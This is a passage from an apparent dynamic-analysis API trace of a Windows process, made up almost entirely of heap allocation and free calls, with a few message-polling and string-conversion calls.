lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.443] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0228.443] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0228.443] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0228.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.446] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0228.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0228.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0228.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0228.450] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.450] HeapFree 